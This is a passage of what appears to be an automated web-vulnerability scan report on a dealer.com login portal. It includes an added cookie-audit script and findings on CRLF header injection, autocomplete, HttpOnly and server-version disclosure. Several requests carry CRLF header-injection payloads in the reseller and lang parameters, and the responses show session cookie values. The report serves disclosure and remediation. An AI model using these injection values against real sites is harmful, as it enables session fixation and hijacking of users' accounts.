Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?sessionTimedOut=true
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:12:25 GMT
Connection: keep-alive
Set-Cookie: ssoid=61040a7440463845001a79eb404a90a2;path=/;domain=.dealer.com,BIGipServerSecureCC5Pool=520162826.20736.0000; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
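Checking this by hand is error-prone because the server folds several cookies onto one Set-Cookie line separated by commas, and the Expires attribute of the second response in this report also contains a comma. The following is an added example, not code from this report or from the scanned application: a Set-Cookie splitter and parser, an audit that reports the missing flags for every cookie on the line, and the form in which the header should be emitted instead. The input lines are copied from the responses in this report; the list of names treated as session cookies (ssoid, which the report identifies, and JSESSIONID, the Jetty session id visible in the requests) is an assumption made for the example, and the HttpOnly check goes beyond what this report's Secure-flag test covers.

```javascript
// Added example (not code from the report or the scanned application): a
// Set-Cookie parser and audit. Input lines are copied from the responses in
// this report; the audit policy (which names count as session cookies) is an
// assumption made for the example.

// The two Set-Cookie values seen in the scan. Both put several cookies on one
// header line separated by commas, a folding that the Expires date (which
// itself contains a comma) makes ambiguous.
const SAMPLE_SET_COOKIE = [
  'ssoid=61040a7440463845001a79eb404a90a2;path=/;domain=.dealer.com,BIGipServerSecureCC5Pool=520162826.20736.0000; path=/',
  'ssoid=61045a9640463812016995a2535254ac;path=/;domain=.dealer.com,ssoid=61045a9640463812016995a2535254ac;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT',
];

// Assumed: cookie names that carry authentication state in this application.
const SESSION_COOKIE_NAMES = new Set(['ssoid', 'JSESSIONID']);

// Split a comma-folded Set-Cookie line. A comma starts a new cookie only when
// it is followed by something that looks like "name=", which the
// "Thu, 01 Jan 1970 ..." inside an Expires attribute never does.
function splitFoldedSetCookie(header) {
  const out = [];
  let start = 0;
  for (let i = 0; i < header.length; i++) {
    if (header[i] === ',' && /^\s*[^;,=\s]+=/.test(header.slice(i + 1))) {
      out.push(header.slice(start, i));
      start = i + 1;
    }
  }
  out.push(header.slice(start));
  return out.map(s => s.trim()).filter(Boolean);
}

// Parse one cookie-pair plus its attributes; attribute names are compared
// case-insensitively as RFC 6265 requires.
function parseSetCookie(cookie) {
  const [pair, ...attrs] = cookie.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const c = {
    name: eq < 0 ? pair : pair.slice(0, eq), value: eq < 0 ? '' : pair.slice(eq + 1),
    secure: false, httpOnly: false, domain: null, path: null, expires: null, sameSite: null,
  };
  for (const a of attrs) {
    const i = a.indexOf('=');
    const k = (i < 0 ? a : a.slice(0, i)).trim().toLowerCase();
    const v = i < 0 ? '' : a.slice(i + 1).trim();
    if (k === 'secure') c.secure = true;
    else if (k === 'httponly') c.httpOnly = true;
    else if (k === 'domain') c.domain = v;
    else if (k === 'path') c.path = v;
    else if (k === 'expires') c.expires = v;
    else if (k === 'samesite') c.sameSite = v;
  }
  return c;
}

// Audit every cookie on a Set-Cookie line: missing Secure on any cookie (the
// report's rule), plus missing HttpOnly on the session cookies.
function auditSetCookie(header) {
  return splitFoldedSetCookie(header).map(parseSetCookie).map(c => {
    const findings = [];
    if (!c.secure) findings.push('missing Secure: also sent over plain http://');
    if (SESSION_COOKIE_NAMES.has(c.name) && !c.httpOnly) findings.push('missing HttpOnly: readable by injected script');
    return { ...c, findings };
  });
}

// How the header should be emitted: one Set-Cookie per cookie, no folding,
// Secure and HttpOnly set. Only RFC 6265 cookie-octets are accepted in the value.
function buildSetCookie(name, value, { path = '/', domain = null, maxAge = null, sameSite = 'Lax' } = {}) {
  if (!/^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/.test(name)) throw new Error('invalid cookie name');
  if (/[^\x21\x23-\x2B\x2D-\x3A\x3C-\x5B\x5D-\x7E]/.test(value)) throw new Error('invalid cookie value');
  const parts = [name + '=' + value, 'Path=' + path, 'Secure', 'HttpOnly', 'SameSite=' + sameSite];
  if (domain) parts.push('Domain=' + domain);
  if (maxAge !== null) parts.push('Max-Age=' + maxAge);
  return parts.join('; ');
}

for (const h of SAMPLE_SET_COOKIE) {
  for (const c of auditSetCookie(h)) console.log(c.name, c.findings);
}
console.log(buildSetCookie('ssoid', '61040a7440463845001a79eb404a90a2', { domain: '.dealer.com' }));
```

Running the audit over the report's own header lines shows that the load-balancer cookie BIGipServerSecureCC5Pool lacks the Secure flag as well, not only the ssoid cookie the report names. The Domain=.dealer.com attribute on ssoid is worth keeping in mind when judging exposure: it makes the cookie available to every host under dealer.com, so any http:// request to any of those hosts will carry it.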


HTTP Header Injection

HTTP Header Injection

4 TOTAL
MEDIUM
A CRLF (new line) injection into HTTP response headers was identified: request input is copied into a response header (here the Location header of the login redirect) without carriage-return and line-feed characters being rejected or encoded, so an attacker can terminate that header and append headers of their own.

Impact

Depending on the application, an attacker might carry out the following attacks:
  • Cross-site scripting, which can lead to session hijacking
  • Session fixation, by setting a new cookie through an injected Set-Cookie header, which again can lead to session hijacking

Actions to Take

  1. See the remedy for solution.
  2. Ensure the server security patches are up to date and that the current stable version of the software is in use.

Remedy

Do not allow carriage-return or line-feed characters (including their URL-encoded forms %0D and %0A) in any value that is written into a response header. URL-encode values that are placed in a Location header, and where possible validate them against a strict whitelist: a language code such as en_US and a numeric reseller id have no legitimate reason to contain anything else.

Required Skills for Successful Exploitation

Crafting the attack to exploit this issue is not a complex process; however, most unsophisticated attackers will not know that such an attack is possible. The attacker also needs to reach the victim by e-mail or a similar method in order to entice them to visit the site or click on a crafted URL.

- /views/login

/views/login

https://cc.dealer.com/views/login?sessionTimedOut=true&action=Login&lang=http://example.com/%3f%0D%0..

Parameters

Parameter Type Value
sessionTimedOut GET true
action GET Login
lang GET http://example.com/? ns: netsparker056650=vuln
password GET 3
reseller GET 3
storeCookie GET storeCookie

Request

GET /views/login?sessionTimedOut=true&action=Login&lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&password=3&reseller=3&storeCookie=storeCookie HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2650869258.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=1to63gypndse0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=3&lang=http://example.com/?
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:12:45 GMT
Connection: keep-alive
Set-Cookie: ssoid=61045a9640463812016995a2535254ac;path=/;domain=.dealer.com,ssoid=61045a9640463812016995a2535254ac;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT


- /views/login

/views/login

https://cc.dealer.com/views/login?sessionTimedOut=true&action=Login&lang=3&password=3&reseller=http:..

Parameters

Parameter Type Value
sessionTimedOut GET true
action GET Login
lang GET 3
password GET 3
reseller GET http://example.com/? ns: netsparker056650=vuln
storeCookie GET storeCookie

Request

GET /views/login?sessionTimedOut=true&action=Login&lang=3&password=3&reseller=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&storeCookie=storeCookie HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b2hdkty4k0kk
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=http://example.com/?
ns: netsparker056650=vuln&lang=3
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:12:49 GMT
Connection: keep-alive
Set-Cookie: ssoid=6104696b404638d30061b29f0ee5198c;path=/;domain=.dealer.com,ssoid=6104696b404638d30061b29f0ee5198c;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT


- /views/mshtml.HTMLInputElementClass

/views/mshtml.HTMLInputElementClass

https://cc.dealer.com/views/mshtml.HTMLInputElementClass

Parameters

Parameter Type Value
action POST Login
reseller POST http://example.com/? ns: netsparker056650=vuln
lang POST 3
username POST Ronald Smith
password POST 3
storeCookie POST storeCookie

Request

POST /views/mshtml.HTMLInputElementClass HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=1psr2n1hjmjat; ssoid=6105c41b404638d30061b29f6bba11ad
Content-Length: 141
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

action=Login&reseller=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&lang=3&username=Ronald+Smith&password=3&storeCookie=storeCookie

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=http://example.com/?
ns: netsparker056650vuln&lang=3&reason=INVALID_USERNAME_PASSWORD
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:14:18 GMT
Connection: keep-alive
Set-Cookie: ssoid=6105c41b404638d30061b29f6bba11ad;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT,ssoid=6105c4e8404638bf01d3e3f37391fef2;path=/;domain=.dealer.com
Expires: Thu, 01 Jan 1970 00:00:00 GMT


- /views/mshtml.HTMLInputElementClass

/views/mshtml.HTMLInputElementClass

https://cc.dealer.com/views/mshtml.HTMLInputElementClass

Parameters

Parameter Type Value
action POST Login
reseller POST 3
lang POST http://example.com/? ns: netsparker056650=vuln
username POST Ronald Smith
password POST 3
storeCookie POST storeCookie

Request

POST /views/mshtml.HTMLInputElementClass HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=1psr2n1hjmjat; ssoid=6105c5714046381101f5ba553115c7e3
Content-Length: 141
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

action=Login&reseller=3&lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&username=Ronald+Smith&password=3&storeCookie=storeCookie

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=3&lang=http://example.com/?
ns: netsparker056650vuln&reason=INVALID_USERNAME_PASSWORD
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:14:19 GMT
Connection: keep-alive
Set-Cookie: ssoid=6105c5714046381101f5ba553115c7e3;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT,ssoid=6105c725404638d30061b29f59df6503;path=/;domain=.dealer.com
Expires: Thu, 01 Jan 1970 00:00:00 GMT


Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete on them. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy, and a number of automated tools exist to do this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?sessionTimedOut=true

Identified Field Name

password

Request

GET /views/login?sessionTimedOut=true HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3703
Date: Sun, 17 Apr 2011 01:12:25 GMT
Connection: keep-alive
Set-Cookie: ssoid=61040b4f404638d30061b29f51d97f36;path=/;domain=.dealer.com,BIGipServerSecureCC5Pool=2248216074.20736.0000; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>Dealer.com Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller=&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller=&lang=en_US"); } </script> <!-- NOTE; Moving to external file doesn't play nice --><style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc2.dealer.com/images/login_graphic.png?1276795935000) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: 
normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value=""><input type="hidden" name="lang" value=""><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center" class="ieHack"><a href="http://dealer.com" target="_blank" border="0"><span>Visit Dealer.com</span></a></td> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> <div class="instructions">Your session has expired, please login again.</div> </td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> 
</tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" 
width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/> <!--<br/>You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a><br/><br/><br/>--> Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. 
</span><br/><br/> <img src="https://cc3.dealer.com/images/logo.png?1276795935000" border='0'><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! 
var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller=&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Dealer.com Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>
Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after this change, JavaScript code will not be able to read them).

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However, this is not a silver bullet and will not by itself protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

- /views/

/views/ CONFIRMED

https://cc.dealer.com/views/

Identified Cookie

ssoid

Request

GET /views/ HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?sessionTimedOut=true
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:12:25 GMT
Connection: keep-alive
Set-Cookie: ssoid=61040a7440463845001a79eb404a90a2;path=/;domain=.dealer.com,BIGipServerSecureCC5Pool=520162826.20736.0000; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT


Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

- /views/login

/views/login

http://cc.dealer.com/views/login

Extracted Version

Apache/2.2.3 (CentOS)

Request

GET /views/login HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2650869258.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; ssoid=61040d2140463812016995a202bc0759
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (CentOS)
Location: https://cc.dealer.com/views/login
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:12:26 GMT
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://cc.dealer.com/views/login">here</a>.</p></body></html>